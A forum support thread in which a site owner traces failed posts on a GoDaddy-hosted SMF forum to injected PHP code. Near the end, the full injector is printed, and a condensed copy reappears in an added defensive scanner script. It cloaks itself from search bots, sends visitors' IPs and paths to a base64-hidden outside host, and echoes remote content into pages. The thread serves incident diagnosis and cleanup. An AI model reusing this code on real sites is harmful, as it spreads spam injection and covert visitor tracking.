So I was in Vegas from July 17-22. I didn't have time to do any posting while there. Today I logged in and noticed there were no posts made since July 17! I didn't think anything of it. But then when I tried to post something, I got the following error message in my Firefox browser (and other browsers):
"The connection was reset
The connection to the server was reset while the page was loading."
I even tried my phone on the WAP version of the forum, but still nothing.
I never made any changes to the website or the forum.
In fact, I even tried to log in using another user name, and that too failed. Basically, anything that involves submitting a form (posting, logging in, searching, etc.) won't work.
I have my site hosted on GoDaddy and I noticed they no longer have the option to submit a support ticket, so I have had to call them. I was on hold for half an hour and I just gave up and decided to call them later.
What can cause this? The forum is fully browsable (assyrianvoice-dot-net-slash-forum) but I just can't post, of course.
Please help!
Godaddy are quite famous, for this. Chances are, they've changed something, in the configuration.
Possibly, mod_sec.
Best to have a natter, with them, first. :)
Quote from: K@ on July 23, 2014, 11:19:54 AM
Godaddy are quite famous, for this. Chances are, they've changed something, in the configuration.
Possibly, mod_sec.
Best to have a natter, with them, first. :)
Thanks a lot for the reply! Any idea what the ideal setting for 'mod_sec' should be?
Mmm interesting and frustrating that this would coincidentally happen on the day I leave (and no user bothered to email and let me know the forum is down) - at least it didn't ruin my Vegas vacation :)
Since this is a hosted site on a shared server, I hope they won't mind changing the setting to make my forum workable again.
mod_security should be just turned off ;) they usually do it if you ask them kindly AFAIK :)
I am speaking to them right now and he can't figure out what the problem is. He is probably going to escalate it to his advanced team.
Actually, he thinks it is due to my DB being large (about 975 MB) but I don't think that should be an issue. 975 MB is not a big deal compared to some other DBs I have seen that are 10x as big and also being hosted on shared hosting.
Godaddy are weird, with mod_sec. They're notorious for having it set quite harshly and they refuse to change it.
To show you how silly it is, it'll freak at the word "Essex", coz it contains the letters "S", "E" and "X", in that order.
It should be banned, itself, methinks.
GoDaddy has opened an incident ticket to look into this, but I was looking at my error file and I found the following:
"Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "36"] [id "10725"] [msg "BLOCKED - PHP Script hidden as a GIF - Pattern 1 - Location: file"] [hostname "www.sitename.net"] [uri "/forum/index.php"] [unique_id "U8-FCESy-gEAAAcyda0AAABF"]"
Does this ring a bell or mean anything to anyone please?
try asking them to disable mod_security... good luck getting it done.
Yeah, that kinda confirms my thoughts. (Yay me!) ;)
Good luck, coz I have a feeling you're gonna need it, with Nodaddy.
Hey you two! :)
Quote from: Flavio93Zena on July 23, 2014, 11:47:44 AM
mod_security should be just turned off ;)
I had said that already :P ninja'd :3
Quote from: K@ on July 24, 2014, 04:59:48 PM
Nodaddy.
I am 100% sure that that is not a typo XD
It was more polite than what I was thinking... :)
In case it helps that's an error I was seeing every five minutes when I was hosted with GoDaddy. Since I moved my site to CoreISP I haven't seen it once :)
Godaddy has responded and is telling me that there is malware in my website and that they can't help! I don't know if I believe that. I searched my site using multiple security sites but nothing is found.
Again, this is the error I am getting and I would really appreciate if anyone can help:
"ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "36"] [id "10725"] [msg "BLOCKED - PHP Script hidden as a GIF - Pattern 1 - Location: file"] [hostname "www.assyrianvoice.net"] [uri "/forum/index.php"] [unique_id "U9JVykSy-gEAAA410XcAAAAD"]"
I have responded to them already and asked them to look into this again. I am really frustrated, my 10+ years forum is now down for over a week, for the first time ever.
It would really help if they could be clear about what exactly has tripped that rule :(
The funny thing is, in my error log, I see that same error for another section on my website (it is a simple BB software, not SMF)
[Fri Jul 25 06:04:20 2014] [error] [client xx xxx xxx xxx] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "25"] [id "10710"] [msg "BLOCKED - Known Template(cached)"] [hostname "www.xxxxxxxx.net"] [uri "/mb/mboard.php"] [unique_id "U9JV00Sy-gEAAC86SsIAAAB1"]
but when I go to that section mentioned above, I don't have a problem like with SMF and can use it fine.
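The two log lines quoted in this thread share the same rule file but differ in rule id and line, which is the detail the host never spelled out. As an added example (not from the thread, SMF or GoDaddy), this parser pulls the bracketed `[key "value"]` fields out of Apache error-log lines carrying ModSecurity events and tallies which rule blocked which URI; the sample lines are the two posted above, with the hostname and client IP masked exactly as they were posted.

```python
"""Pull the rule id, message and URI out of ModSecurity error-log lines."""
import re
from collections import Counter
from datetime import datetime

# [key "value"] fields that mod_security appends to its error-log message.
FIELD = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')
HEAD = re.compile(r'ModSecurity: (?P<action>.+?) \(phase (?P<phase>\d)\)\.')
# Apache's error-log timestamp prefix, present on lines read from the raw log.
APACHE_TS = re.compile(r'^\[(\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4})\]')

# The two lines quoted in the thread (hostname and IP masked as posted there).
SAMPLE_LINES = [
    'ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "36"] [id "10725"] [msg "BLOCKED - PHP Script hidden as a GIF - Pattern 1 - Location: file"] [hostname "www.assyrianvoice.net"] [uri "/forum/index.php"] [unique_id "U9JVykSy-gEAAA410XcAAAAD"]',
    '[Fri Jul 25 06:04:20 2014] [error] [client xx xxx xxx xxx] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "25"] [id "10710"] [msg "BLOCKED - Known Template(cached)"] [hostname "www.xxxxxxxx.net"] [uri "/mb/mboard.php"] [unique_id "U9JV00Sy-gEAAC86SsIAAAB1"]',
]


def parse_modsec_line(line):
    """Return a dict of fields for one line, or None if it is not a ModSecurity event."""
    head = HEAD.search(line)
    if not head:
        return None
    rec = {"action": head.group("action"), "phase": int(head.group("phase")), "time": None}
    ts = APACHE_TS.match(line)
    if ts:
        rec["time"] = datetime.strptime(ts.group(1), "%a %b %d %H:%M:%S %Y")
    for key, value in FIELD.findall(line):
        rec.setdefault(key, value.replace('\\"', '"'))   # first occurrence of a key wins
    return rec


def summarize(lines):
    """Count blocks per (rule id, rule file:line, uri) so the tripped rules stand out."""
    counts = Counter()
    for line in lines:
        rec = parse_modsec_line(line)
        if rec and "id" in rec:
            rule = "{}:{}".format(rec.get("file", "?").rsplit("/", 1)[-1], rec.get("line", "?"))
            counts[(rec["id"], rule, rec.get("uri", "?"))] += 1
    return counts


if __name__ == "__main__":
    for (rule_id, rule, uri), n in summarize(SAMPLE_LINES).most_common():
        print(f"{n:4d}  id={rule_id}  {rule}  {uri}")
```

Run it over the whole error log (`grep ModSecurity error_log`) rather than two lines and the table shows which rule ids dominate and whether a given URI is hit by every POST or only some. The `unique_id` value is Apache's mod_unique_id token, so if the host also logs it in the access log it ties each block back to the exact request and client.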
At least we know it's mod_security at fault, which is something. I'd love to know what rule is being flouted since the description doesn't really make sense to me.
Ok, here is their email to me. They are actually faulting my home page (index.php) for the malware!
--------------------------------------------------------------
In regard to the inability to access and/or view the assyrianvoice.net website, upon additional review, our hosting administrators have determined a PHP script has been embedded as a GIF file on the home page of the website. As such, and due to the potential malicious nature of such coding, this is preventing access to the content. You may review the following information with regard to potential malware.
Malware is short for malicious software. It's a catch-all term that describes harmful applications or other malicious code such as adware, spyware, trojan horses, worms or viruses.
Malware comes in many forms, from an unwanted ad reappearing on your site to an executable file that infects visitors who click on it. Telltale signs that your site is infected can include unexplained ads, links or pop-ups, but some malware can have no noticeable effects at all.
Your best defenses against malware are staying current with third-party application patches and using strong server passwords. When checking for the presence of malware, be sure to check the code residing on your server and not your backup files. Always use a virtual machine for verification to avoid infecting your own computer.
We cannot assist you with removing malware from your server. Consider taking your site down immediately to prevent infecting visitors, and take action quickly to identify/remove it.
Identifying Malware
If you think you're having an issue with malware, change passwords that would be affected such as FTP or database passwords. Then use these guidelines to identify the problem.
............................................................
See, the problem is, I don't even know if they are talking about the same issue I am having! I told them I have a problem with my forum, and they write back saying I have malware in my home page which is preventing me from accessing the content. I am able to access all content with no problem. The only thing I can't do is post/login/search my SMF forums. Period!
I already replied to them to let them know that they may not be looking at the right problem here.
I already checked my home page and don't see anything wrong with it, but if someone is willing to take a look at it further, I will gladly post it here.
Thanks,
That's awfully vague. Specifics from the host would be appreciated.
I just called them to get an update/escalation on my ticket and the wait time was close to 20+ minutes. Been with them for over a decade and noticed their wait times have never been as long as they have been in the last few days.
Spoke to them again. They said it looks like a PHP file, likely disguised as a GIF file, was uploaded to my website. This file is acting as malware and thus GoDaddy is blocking it from making a connection every time an action is taken that triggers it.
They said they will try to look for this malicious code and they have no easy way of finding it, if ever.
If anyone knows where I can look for this code, it would be great. I already scanned my site but found nothing.
And I am not even sure where this malware is, whether it is on my forum directory or other places. Forum is the only section I can think of that can allow you to upload images.
IMHO they are fooling you... I've never heard about anything similar before...
Quote from: backend on July 25, 2014, 02:20:07 PM
They said they will try to look for this malicious code and they have no easy way of finding it, if ever.
That inspires confidence in them, doesn't it? ;)
If I'd been unfortunate enough to use Nodaddy, I think I'd look through my directories, setting the files in date order, to see if there's a file, there, which has a recent date on it, that looks a bit spurious.
I have a feeling that I wouldn't find anything, though.
Can you do a file compare (Laborious though that is)?
Quote from: Flavio93Zena on July 25, 2014, 02:29:33 PM
IMHO they are fooling you... I've never heard about anything similar before...
it has happened before... it was the cause of many hackings before the attachments and avatars got encrypted file names. any decent host would let you know the name of the file at least.
Quote from: Illori on July 25, 2014, 02:32:33 PM
Quote from: Flavio93Zena on July 25, 2014, 02:29:33 PM
IMHO they are fooling you... I've never heard about anything similar before...
it has happened before... it was the cause of many hackings before the attachments and avatars got encrypted file names. any decent host would let you know the name of the file at least.
Well thanks for letting me know :) and I agree actually, any decent host would have mentioned the name of the file, they should have it in their logs somewhere.
This is a duplicate of my issue and we are running at the same status... Funny same date and same responses
Their final answer is that this is third party software and that it's not their problem.
Mods, should we merge the two threads...
Will follow to see if you get anywhere
So far it's looking like an uninstall and reinstall, but I don't want to lose all of our history... ARGHHHHH
Quote from: iamarealbigdog on July 24, 2014, 09:13:25 AM
Canadian Southern BBQ Association
Very active forum for 2 yrs
http: //www.csbbqa.com/smf_forum/index.php
version 2.02
Host Go Daddy
Issue started July 17th, 2014; was intermittent for the day but by the end of the day affected all users
http://www.simplemachines.org/community/index.php?topic=525600.0
this is the other thread I am running on
For the love of gods, why do people assume that a clean set of files will lose their data?
Does no one actually read the FAQ/manual about how to load a fresh set of files?
Quote from: Kindred on July 25, 2014, 05:33:46 PM
For the love of gods, why do people assume that a clean set of files will lose their data?
Does no one actually read the FAQ/manual about how to load a fresh set of files?
Apparently not! :-)
Quote from: Kindred on July 25, 2014, 05:33:46 PM
For the love of gods, why do people assume that a clean set of files will lose their data?
Ask them :P
Quote from: Kindred on July 25, 2014, 05:33:46 PM
Does no one actually read the FAQ/manual about how to load a fresh set of files?
Probably they don't xD anyway you will probably be posting from the phone so I will provide you the link you are talking about --> http://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files
Quote from: Kindred on July 25, 2014, 05:33:46 PM
For the love of gods, why do people assume that a clean set of files will lose their data?
Does no one actually read the FAQ/manual about how to load a fresh set of files?
With no disrespect intended, I have a full time job, a competition BBQ team to run, a national BBQ association, and just spent 6 hours on the phone with Go Daddy for them basically to tell me to piss off.
I am not a computer IT specialist and I maintain a forum for BBQ enthusiasts. I can cook the world's best steak, Canada's best Whole Hog and an awesome chili, being the undefeated National Chili Champion. I am doing research for our team's submission to the 2014 World food championship and putting three kids through University.
As of writing this message there is 3,510,977 Posts in 426,081 Topics by 338,009 Members on this forum.
Sorry I did not get to the one message you indicated,
Quote from: Flavio93Zena on July 25, 2014, 05:45:22 PM
Probably they don't xD anyway you will probably be posting from the phone so I will provide you the link you are talking about --> http://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files
Thank you kindly this will save me countless hours of work
Mike
Quote from: iamarealbigdog on July 25, 2014, 06:39:11 PM
Quote from: Flavio93Zena on July 25, 2014, 05:45:22 PM
Probably they don't xD anyway you will probably be posting from the phone so I will provide you the link you are talking about --> http://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files
Thank you kindly this will save me countless hours of work
Mike
No problem you're very welcome :D
Do note, I did indeed indicate the FAQ, not all the messages in the forum (and as noted, I didn't link you directly because I was posting from a phone and it's difficult to paste links -- but hopefully, pointing someone to the FAQ will encourage them to read it. :) )
I'll argue about the steak later... I cook a mean sirloin, rubbed with a cacao/chipotle dry rub... :D
UPDATE
We were able to reset our system and posting is back online... I hate Go Daddy, why do I give them so much money. I will spend the weekend backing up again and then upgrading to the 2.08 version...
Thanks all
(and as for the steak, we are the holders of three world championships titles for it, good luck)
Quote from: Kindred on July 25, 2014, 08:52:28 PM
I cook a mean sirloin, rubbed with a cacao/chipotle dry rub... :D
[OT]When's the BBQ?[/OT]
Quote from: iamarealbigdog on July 25, 2014, 09:54:35 PM
UPDATE
We were able to reset our system and posting is back online... I hate Go Daddy, why do I give them so much money. I will spend the weekend backing up again and then upgrading to the 2.08 version...
Thanks all
(and as for the steak, we are the holders of three world championships titles for it, good luck)
Can you explain what you mean by 'resetting our system'?
Did you have to start from scratch or did GoDaddy resolve the issue?
I don't think it was a good idea to merge these two threads. One issue got resolved and the topic was marked solved while the other issue (mine) is not resolved yet, so it is a bit confusing.
It is almost 2 weeks now and the issue is still not resolved. Last time I called GoDaddy, they said they are still working on it.
I even went ahead and installed SiteMark and so far it hasn't found any issues, although the 'SQL Injection Scan' and 'Application' scans are still pending.
if it had been 2 weeks and i was waiting i would have already started to search for a new host...
Quote from: Illori on July 29, 2014, 09:58:22 AM
if it had been 2 weeks and i was waiting i would have already started to search for a new host...
you guys make it sound so easy to just search for a new host.
honestly, I have been with GoDaddy since about 2001 or so and hardly ever had a problem. I have so much hosted with them and moving away would be a nightmare. I mean it is doable but don't think it is warranted.
I just want to see what others have done to fix this issue so I can maybe replicate it.
pick a host from here http://www.simplemachines.org/community/index.php?board=155.0 and they will move all your sites files etc for you.
Ok so here is something strange.
I found a loophole that finally allows me to post to my forum: using the iPhone app 'Tapatalk', I was shocked to find out that I can post with no problem.
Meanwhile , I still can't post using a browser.
Of course, this is not the solution to my problem, but maybe it can help us find a solution. In other words, why am I able to post from an iPhone app and not from a browser? How can we use that to solve the problem at hand, if at all?
Quote from: backend on August 02, 2014, 01:11:33 AM
Ok so here is something strange.
I found a loophole that finally allows me to post to my forum : using the iPhone app 'Tapatalk' I was shocked to find out that I can post with no problem.
Meanwhile , I still can't post using a browser.
Of course, this is not the solution to my problem, but maybe it can help us find a solution. In other words, why am I able to post from an iPhone app and not from a browser? How can we use that to solve the problem at hand, if at all?
So, anyone got a clue on this please?
Ok, so after being patient for some +3 weeks, they have finally resolved the issue. But I am not really sure what the issue was and their email below is very vague. I did reply asking them to explain what the issue was and I am still waiting:
The issue with your Authorize.net transactions on your two secondary domains has been addressed and resolved. If this issue re-occurs, or you experience any other problems please let us know and we would be happy to assist you further. We appreciate your patience and understanding in this matter.
First of all, what the hell is Authorize.net? I have never used it on my website and have no idea what it is. Second of all, what do they mean 'two domain names'? Sure I have a few domain names hosted with them but what does that have to do with this issue?
It is as if they are talking about a completely different issue or client.
I hope to call them later this week to clarify what the issue was.
Damn it, I think I spoke too soon! After working for almost two days with no problem, it has stopped working again now, damn it! Same issue again....
Hope it is temporary...
Found this information that may be of usage to some:
http://developers.wpeasycart.com/2014/07/31/godaddy-shared-hosting-now-an-issue/
How's this going, now?
Quote from: K@ on August 14, 2014, 04:11:49 PM
How's this going, now?
Hi there, not sure if you read my last 3 posts or so, they fixed the problem, only for it to come back again about 48 hours later.
Now I am in touch with them again.
Will keep you guys updated.
Might be best to bite the bullet and give godaddy the flick...
It has now been 40 days and I still have this issue.
Spoke to GoDaddy on Sunday and the rep said it is now with their 4th level support.
40 days and you still haven't jumped ship?
GoDaddy is lucky to have such a loyal client, heh.
Considering they don't seem to be able to resolve the issue, I'd start considering my options.
Quote from: CoreISP on August 27, 2014, 09:46:47 PM
40 days and you still haven't jumped ship?
GoDaddy is lucky to have such a loyal client, heh.
Considering they don't seem to be able to resolve the issue, I'd start considering my options.
Couldn't have said it better myself. I was with GD for about a year in the very beginning and had nothing but issues when it came to SMF and WP. Moved eight years ago and have not had one issue since.
Guys I have been with Godaddy for almost 14 years (SMF since 2005) and have never had any real problems. This is the first one and unfortunately it has been my worst ever.
Quote from: backend on August 27, 2014, 11:35:10 PM
Guys I have been with Godaddy for almost 14 years (SMF since 2005) and have never had any real problems. This is the first one and unfortunately it has been my worst ever.
2014-2005=9, not 14 actually... Anyway I think you have been really lucky if you check the whole forum you will find lots of topics made by angry people experiencing troubles because of GoDaddy's servers...
One can be a user on GoDaddy's servers without SMF, you know ;)
As a website, been with GD for about 14 years.
As for SMF, I have had it with GD for about 9 years now.
And this makes me think I should go to bed, lol on that one :P
Anyway it doesn't change very much, you have been lucky ;)
Don't hold your breath... If you search for posts involving Godaddy, here, you'll see why... :(
Guys, finally some good news! :)
Got a reply back from GoDaddy telling me that some 23 pages on my website (not just SMF) were infected with some code. But they only gave me part of the code. I did some research and found the following code which others have complained about as well:
<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {$sResult[0]=" ";
        echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>
I looked at my index.php and found it at the very bottom of the page.
When I deleted that part, the forums were back up and running like magic! I couldn't believe it, what a relief!!!!!!!!!!!
Now I just have to remove it from the other pages.
Now here is my question: how can I make sure this doesn't happen again? Is this happening through an SMF mod/theme or even a WordPress plugin? Where do you even start?
I have already changed my forum/cPanel/FTP passwords. What else can I do?
I will keep an eye on this for the next few days to see if the code will somehow come back and let you guys know. If not, I will mark this topic solved.
ooh... that is sneaky...
http://www.peterrosenmai.com/a-hacking-visible-only-to-google
decode the base64 - it points to botstatistic...
So - looks like you were hacked.
1- start checking *ALL* files and directories. Hackers rarely drop a single payload.
2- figure out WHEN it happened. Look at the timestamp on the modified files (before you removed the code yourself) - then ask your host to help get the server logs for that time period.
3- report with the server logs to the security form
http://www.simplemachines.org/about/smf/security.php
and you can send the server logs to
[email protected]
When you file the report, indicate the SMF version, mods installed and whether you have any other software installed on the same server.
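Step 1 above (check all files, not just the one you found) and K@'s earlier suggestion of listing files by date are the two checks this added example automates; it is not SMF code and not the scanner GoDaddy used. It looks for the signature pieces of the block posted above: the base64-encoded callback URL (decoded and reported; the literal in the post decodes to `http://botstatisticupdate.com/stat/stat.php`, which is the `botstatistic` domain noted above), the user-agent cloaking that hides the payload from search engines, `curl_exec` pulling remote content into the page, and image files that begin with PHP code (the "PHP script hidden as a GIF" the host's rule named). Findings are returned newest-modified first so the infection window can be read off the mtimes before anything is cleaned. The sample web root, `SAMPLE_INJECTED` (a condensed copy of the posted block) and the timestamps are constructed for the demo, not real site data.

```python
"""Find the injected PHP block from this thread and PHP-in-image files."""
import base64
import os
import re
import shutil
import tempfile
from pathlib import Path

# Signature pieces taken from the injected code posted in the thread.
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
UA_CLOAK = re.compile(
    r"strstr\(\s*\$\w+\s*,\s*['\"](?:google|yahoo|bing|bot)['\"]\s*\)\s*==\s*false")
CURL_INIT = re.compile(r"curl_init\(\s*\$\w+\s*\)")
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)
IMAGE_EXT = {".gif", ".jpg", ".jpeg", ".png"}
CODE_EXT = {".php", ".inc", ".html", ".htm", ".tpl"}

# Constructed sample: a condensed copy of the block posted above, used only to
# exercise the scanner. The base64 literal is the one from the post.
SAMPLE_INJECTED = r"""<?php
if (!isset($sRetry)) {
    $sRetry = 1;
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if ((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'bot') == false)) {
        $stCurlLink = base64_decode('aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
        @$stCurlHandle = curl_init($stCurlLink);
        $sResult = @curl_exec($stCurlHandle);
        echo $sResult;
    }
}
?>
"""


def decode_b64_literals(source):
    """Decode every base64_decode('...') literal; keep printable results only."""
    out = []
    for m in B64_LITERAL.finditer(source):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return out


def scan_source(source):
    """Return the indicator names found in one code file's contents."""
    hits = []
    urls = [u for u in decode_b64_literals(source) if u.startswith(("http://", "https://"))]
    if urls:
        hits.append("b64_callback:" + ",".join(urls))
    if UA_CLOAK.search(source):
        hits.append("ua_cloaking")
    if CURL_INIT.search(source) and "curl_exec" in source:
        hits.append("curl_fetch")
    return hits


def scan_tree(root):
    """Walk root and return [(path, mtime, hits)], newest-modified first."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        ext = path.suffix.lower()
        if ext in IMAGE_EXT:
            with path.open("rb") as fh:
                head = fh.read(65536)          # droppers sit near the top of the file
            if PHP_TAG.search(head):
                findings.append((str(path), path.stat().st_mtime, ["php_in_image"]))
        elif ext in CODE_EXT:
            hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings.append((str(path), path.stat().st_mtime, hits))
    findings.sort(key=lambda f: f[1], reverse=True)
    return findings


def build_sample_root():
    """Write a constructed web root (not real site data) into a temp dir."""
    root = tempfile.mkdtemp(prefix="webroot_")
    base = 1405555200                           # 2014-07-17 00:00 UTC, the date the thread names
    files = {
        "index.php": ("<?php\necho 'home';\n" + SAMPLE_INJECTED, base + 3600),
        "forum/index.php": ("<?php\n// clean stand-in for the SMF front controller\n", base - 86400),
        "forum/attachments/avatar.gif": ("GIF89a<?php echo 'not an image'; ?>", base),
        "forum/attachments/real.gif": ("GIF89a\x00\x01\x00", base - 86400),
    }
    for rel, (content, mtime) in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content.encode("utf-8"))
        os.utime(p, (mtime, mtime))
    return root


def demo():
    """Scan the constructed root; return [(relative path, hits)] newest first."""
    root = build_sample_root()
    try:
        return [(os.path.relpath(p, root), hits) for p, _, hits in scan_tree(root)]
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for rel, hits in demo():
        print(rel, " ".join(hits))
```

Point `scan_tree()` at the real web root (or a copy of it) before editing anything, and keep the mtime list: the oldest hit is the earliest date worth asking the host for access logs about. A file with `php_in_image` in an attachments or avatars directory is the upload path to look at first, and any `b64_callback` host other than one you put there yourself is worth a DNS or firewall block while you clean up.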